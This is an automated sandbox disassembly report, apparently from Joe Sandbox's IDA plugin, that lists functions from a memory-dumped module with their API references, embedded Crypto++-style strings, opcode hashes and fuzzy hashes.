Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 236c912fe784db7c90faf6e426823ec8ee4ee72b9cd4051c252153a86cd8cd79
Instruction ID: f6cb7e54ac9793b6febbcdb4d738cfe69ce3ac10e219ce7a4ab766a3a97952e8
Opcode Fuzzy Hash: 236c912fe784db7c90faf6e426823ec8ee4ee72b9cd4051c252153a86cd8cd79
Instruction Fuzzy Hash: 275106312487445BC3108FA5C990A7BB7FAAF8630CF688B5DE4D68BB41D727E819C761

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7B9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CE7BA47
_strncmp.LIBCMT ref: 6CE7BAC6

Strings

ValueNames, xrefs: 6CE7B9D7
ThisPointer:, xrefs: 6CE7BA6B, 6CE7BAC0

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 6f230ff13cb609cdbf2a479fa2fae76b3a56816ab2db172f56aa56db53c0147e
Instruction ID: 9a7c6f0e7cb8523e1e3ad14c24da41bb016402422ec3fe66c0d4470f10be9502
Opcode Fuzzy Hash: 6f230ff13cb609cdbf2a479fa2fae76b3a56816ab2db172f56aa56db53c0147e
Instruction Fuzzy Hash: 8A51F635A083445BC3248F69D990E67B7FAAF8621CF244B1DE8D68BB41D722E809C761

Uniqueness

Uniqueness Score: -1.00%

Function 6CE61B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE61C1A

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

__CxxThrowException@8.LIBCMT ref: 6CE61CDE
__CxxThrowException@8.LIBCMT ref: 6CE61D3E

Strings

TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6CE61CF0
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6CE61C67

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
API String ID: 3476068407-3371871069
Opcode ID: 6e2e5fcfcc77de8320560fe382cb3a8a8a6aabccfd5aa68aedc7cacefd8b4b88
Instruction ID: cf58283b4696b5a75b50f533e95bd8bbd8b444c4e4bf3b933c6a985613e4a9c7
Opcode Fuzzy Hash: 6e2e5fcfcc77de8320560fe382cb3a8a8a6aabccfd5aa68aedc7cacefd8b4b88
Instruction Fuzzy Hash: C1513C752087409FD324DF58C880F9AB7F9BFC8704F208A1DE59997791DB74E9098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE56B00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE56BA6

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE24067
Part of subcall function 6CE24010: _memmove.LIBCMT ref: 6CE240C8

__CxxThrowException@8.LIBCMT ref: 6CE56C56

Strings

RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6CE56BE3
Dl, xrefs: 6CE56CE6
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6CE56B33

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented$Dl
API String ID: 1902190269-2163532251
Opcode ID: b4e411d0abd4ce829dc12687d075d8007d5dc7fba026497e39ba3ff3a61805ab
Instruction ID: a5e236a036da81142129a9bffd87554c8b09a253cd8ad238e2988e299a4e8ca1
Opcode Fuzzy Hash: b4e411d0abd4ce829dc12687d075d8007d5dc7fba026497e39ba3ff3a61805ab
Instruction Fuzzy Hash: 95512571108380AFC300CF68C881A5BBBF8BB99754F604A2EF4A597B90D7B4D508CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

Part of subcall function 6CE89125: std::exception::exception.LIBCMT ref: 6CE8913A
Part of subcall function 6CE89125: __CxxThrowException@8.LIBCMT ref: 6CE8914F
Part of subcall function 6CE89125: std::exception::exception.LIBCMT ref: 6CE89160

std::_Xinvalid_argument.LIBCPMT ref: 6CE24067

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE240C8

Strings

invalid string position, xrefs: 6CE24025
string too long, xrefs: 6CE24062

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: c438db7de971337c846ed9110ede044ccd50f0d22cd03cf97205805b239b5a09
Instruction ID: fcf1af0ec0b43f21e9d6b3aa44967aa11bfb4e16cc5692269a89f09d4cfa7e0f
Opcode Fuzzy Hash: c438db7de971337c846ed9110ede044ccd50f0d22cd03cf97205805b239b5a09
Instruction Fuzzy Hash: C531C5333052149BD3218E5CE880F5AF7B9EB91768F340A2FE155CBB80D776988187A3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6CE35D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CE384EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CE384F0
std::exception::exception.LIBCMT ref: 6CE3853C
__CxxThrowException@8.LIBCMT ref: 6CE38551

Strings

0Bl, xrefs: 6CE3854A

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 3005353045-3271211234
Opcode ID: 605d865fe60ff5b083f702cfa3d4f35177d7e70f1c0ac89d48fac42c2e5c1e6e
Instruction ID: 610798f5bd737e21c93383d9cafd04d8263eb764820cd1ee3560c4b51661afbc
Opcode Fuzzy Hash: 605d865fe60ff5b083f702cfa3d4f35177d7e70f1c0ac89d48fac42c2e5c1e6e
Instruction Fuzzy Hash: 0B316F72A01704AFC714CFA9C580A9AFBF4FF19214F508A6ED95597B41D770F644CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8C23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6CE8C24E

Part of subcall function 6CE8C1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6CE8C1DF

_UnwindNestedFrames.LIBCMT ref: 6CE8C265
___FrameUnwindToState.LIBCMT ref: 6CE8C273

Strings

csm, xrefs: 6CE8C23D
csm, xrefs: 6CE8C24A, 6CE8C25F, 6CE8C272, 6CE8C290, 6CE8C2A0

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction ID: 0c96b4d6d0bd8b0d68450a5bad0be036c76654b98fabd6cd43602f3ceeb019b7
Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction Fuzzy Hash: 2F012431502509BBDF126F91CC44EEA7F7AEF09358F204114FD1C25AA0D73698A2DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE62300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CE623F3
_memmove.LIBCMT ref: 6CE62460

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0ca72b7bae8b32bf7ac0389ec1632ce7838b27702e081266a6d6205b72910b22
Instruction ID: d5463cd493d59c005f9ab0096826bcfa01e0e311b816273145f4778ce0dcb088
Opcode Fuzzy Hash: 0ca72b7bae8b32bf7ac0389ec1632ce7838b27702e081266a6d6205b72910b22
Instruction Fuzzy Hash: 0C9190B12587418FD714CF59C884A2BB7F9FB98708F204A2DE499C7B40E734E9058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE51D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(CB65479A), ref: 6CE51D91
timeGetTime.WINMM(CB65479A), ref: 6CE51D9F
timeGetTime.WINMM ref: 6CE51DBB
timeGetTime.WINMM ref: 6CE51DC9
Sleep.KERNEL32(00000032), ref: 6CE51DDC

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Timetime$Sleep
String ID:
API String ID: 4176159691-0
Opcode ID: 5934a184f4cda8505be3ae8f253bb2ac22d124156ee48df33d5c245eef3d8959
Instruction ID: 72b2a92c0ca0cf651052a1f0414f1d1f2c396035c2636cf90be5ba43fcdc50d2
Opcode Fuzzy Hash: 5934a184f4cda8505be3ae8f253bb2ac22d124156ee48df33d5c245eef3d8959
Instruction Fuzzy Hash: F951CFB1E052449FDB00DFE8CA8279DBBB4AB05708F74457ED41897B40D776EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE37750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CE37761
LeaveCriticalSection.KERNEL32(00000000,?), ref: 6CE37782
EnterCriticalSection.KERNEL32(00000018), ref: 6CE37796
LeaveCriticalSection.KERNEL32(00000018), ref: 6CE377CE
QueueUserWorkItem.KERNEL32(6CE51D50,00000000,00000010), ref: 6CE3780C

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ItemQueueUserWork
String ID:
API String ID: 584243675-0
Opcode ID: 93c609328ee03d2e7f222eb5646ac14876fe0f1176735e1e781bd0c77cb69050
Instruction ID: c62bcb31f4a2df846dec29b7a1f336f005c52de4341006d4dd72f52c89b322a4
Opcode Fuzzy Hash: 93c609328ee03d2e7f222eb5646ac14876fe0f1176735e1e781bd0c77cb69050
Instruction Fuzzy Hash: AE218071501318EFCB00CFA4D984A9BBBF8BB45309F20995DE45A87A40DB70F548CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CE8F047

Part of subcall function 6CE8EAE6: __getptd_noexit.LIBCMT ref: 6CE8EAE9
Part of subcall function 6CE8EAE6: __amsg_exit.LIBCMT ref: 6CE8EAF6

__amsg_exit.LIBCMT ref: 6CE8F067
__lock.LIBCMT ref: 6CE8F077
InterlockedDecrement.KERNEL32(?), ref: 6CE8F094
InterlockedIncrement.KERNEL32(07EE1658), ref: 6CE8F0BF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 1a3e3fdaa64f5579a718be854c5a9c091f2495a0d86343d37a56384f2d2afd6d
Instruction ID: ab3eb20c77ad3c7c8b68a413455558cc5ec5fd3259a5937d5d6841cbc4911c58
Opcode Fuzzy Hash: 1a3e3fdaa64f5579a718be854c5a9c091f2495a0d86343d37a56384f2d2afd6d
Instruction Fuzzy Hash: D801AD31A036169FDB119BA58044B9E7770BF0171DF31010AE828A3B80CB38AA45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CE8F7C8

Part of subcall function 6CE8EAE6: __getptd_noexit.LIBCMT ref: 6CE8EAE9
Part of subcall function 6CE8EAE6: __amsg_exit.LIBCMT ref: 6CE8EAF6

__getptd.LIBCMT ref: 6CE8F7DF
__amsg_exit.LIBCMT ref: 6CE8F7ED
__lock.LIBCMT ref: 6CE8F7FD
__updatetlocinfoEx_nolock.LIBCMT ref: 6CE8F811

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 82dd702b67a06745b000f198acca5ef3c34ac8a9a2efab72e76179b494425ccc
Instruction ID: b73f214b0b379878ba1b556c8bd67df3237182b385c859765c0a2849303ddaf9
Opcode Fuzzy Hash: 82dd702b67a06745b000f198acca5ef3c34ac8a9a2efab72e76179b494425ccc
Instruction Fuzzy Hash: 23F09032947B119BFF20ABF89401BCD37B0AF0172CF30415EE428A7BC0DB2D96448A96

Uniqueness

Uniqueness Score: -1.00%

Function 6CE6E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CE6E76F
_memcpy_s.LIBCMT ref: 6CE6E78B

Strings

, xrefs: 6CE6E85A

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-3916222277
Opcode ID: d70cd4810ab69c6469c80dfa261ba92da51ab1817154f7a1024d51cdcad18f6b
Instruction ID: 4b17e78aa54fa7c7b0cb58879d00e11676ee9f8458eaea3b267166d21dc45a25
Opcode Fuzzy Hash: d70cd4810ab69c6469c80dfa261ba92da51ab1817154f7a1024d51cdcad18f6b
Instruction Fuzzy Hash: A1C17B756597028FD704CE2AC88066AB7F1FFC5318F244A2DE496C7B90E734E949CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CE88B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CE88C40
_memset.LIBCMT ref: 6CE88C56
_memmove.LIBCMT ref: 6CE88DA8

Strings

EncodingParameters, xrefs: 6CE88CD6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memcpy_s_memmove_memset
String ID: EncodingParameters
API String ID: 4034675494-55378216
